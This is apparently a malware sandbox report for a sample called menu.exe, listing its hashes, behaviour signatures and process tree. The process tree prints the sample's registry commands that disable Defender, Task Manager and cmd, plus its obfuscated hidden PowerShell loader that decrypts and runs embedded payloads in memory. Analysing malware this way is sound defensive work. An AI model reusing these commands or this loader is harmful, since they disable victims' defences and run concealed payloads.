Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

menu.exe

windows7-x64

8

menu.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    125s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18/11/2024, 02:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    menu.exe

  • Size

    327KB

  • MD5

    0f7fea309ccdc6ba53737fb6d88fcfd3

  • SHA1

    0f3dfdcbbdb0412cbee95c87a366578da973f07b

  • SHA256

    8b777ba206b3be169e56502581528eb3735c758a8e3c8a0f6b4479ddfc92bb78

  • SHA512

    f123781d84ad83a885aa0a4916be9b40adb87090eb301cd9afcf652cbbfd4deaac1f91b09b616d360f1bf70dbb430a99f5226b118140e21f02d5df2deaff133e

  • SSDEEP

    6144:4PQGXEB3uR4D7P05EkRTwEur5447h/PcHnUSFIT7JHoI0E7YPWs3kZ4sUT:4QapW/PqbTw3FcHUSFU1v0E7v43T

Score
8/10
evasionexecution

Malware Config

Signatures

  • Blocks application from running via registry modification 3 IoCs

    Adds application to list of disallowed applications.

    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Disables cmd.exe use via registry modification 1 IoCs
    evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\menu.exe
    "C:\Users\Admin\AppData\Local\Temp\menu.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\load.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2748
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
          3⤵
            PID:2904
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
            3⤵
            • Disables cmd.exe use via registry modification
            PID:2888
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
            3⤵
              PID:3012
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f
              3⤵
                PID:2848
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f
                3⤵
                  PID:2900
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                  3⤵
                    PID:2896
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
                    3⤵
                    • Blocks application from running via registry modification
                    PID:2884
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f
                    3⤵
                    • Blocks application from running via registry modification
                    PID:2768
                • C:\Windows\system32\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2264
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2712
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"
                  2⤵
                    PID:2864

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\load.bat
                  Filesize

                  1KB

                  MD5

                  cf08811b97cdd3d57685a7841a40e2d4

                  SHA1

                  faefa9b229e81eef5d200799c39b5db5511922d2

                  SHA256

                  7f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c

                  SHA512

                  695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\loader.bat
                  Filesize

                  291KB

                  MD5

                  d05f7937bc9eef5bf3042a8a2ecd2f08

                  SHA1

                  15230c5d5506e80ac6cecd06a21bea1a44aeef08

                  SHA256

                  b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226

                  SHA512

                  42954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\ran.vbs
                  Filesize

                  4KB

                  MD5

                  be03bd7bd0315142da6482ee8075f97d

                  SHA1

                  44242df82433922b5dae792842d18da1eccac112

                  SHA256

                  f245b406955a4a335f5eb76ef8e48958c55be9e7e667545e95602440c64ee9ae

                  SHA512

                  55230398878d8cbca4b14a93b9e5cae00790f845140f28c9c82c622e7bc53eb4c9875de281eb3ba280478cbecbe56eb6a1720832e9afc6607daeafb83f83e7e9

                  Download Submit

                • memory/2520-0-0x000007FEF4FC3000-0x000007FEF4FC4000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2520-1-0x0000000000A30000-0x0000000000A88000-memory.dmp

                  Filesize

                  352KB

                  Download

                • memory/2520-22-0x000007FEF4FC0000-0x000007FEF59AC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/2520-24-0x000007FEF4FC0000-0x000007FEF59AC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/2712-30-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

                  Filesize

                  2.9MB

                  Download

                • memory/2712-31-0x0000000001D80000-0x0000000001D88000-memory.dmp

                  Filesize

                  32KB

                  Download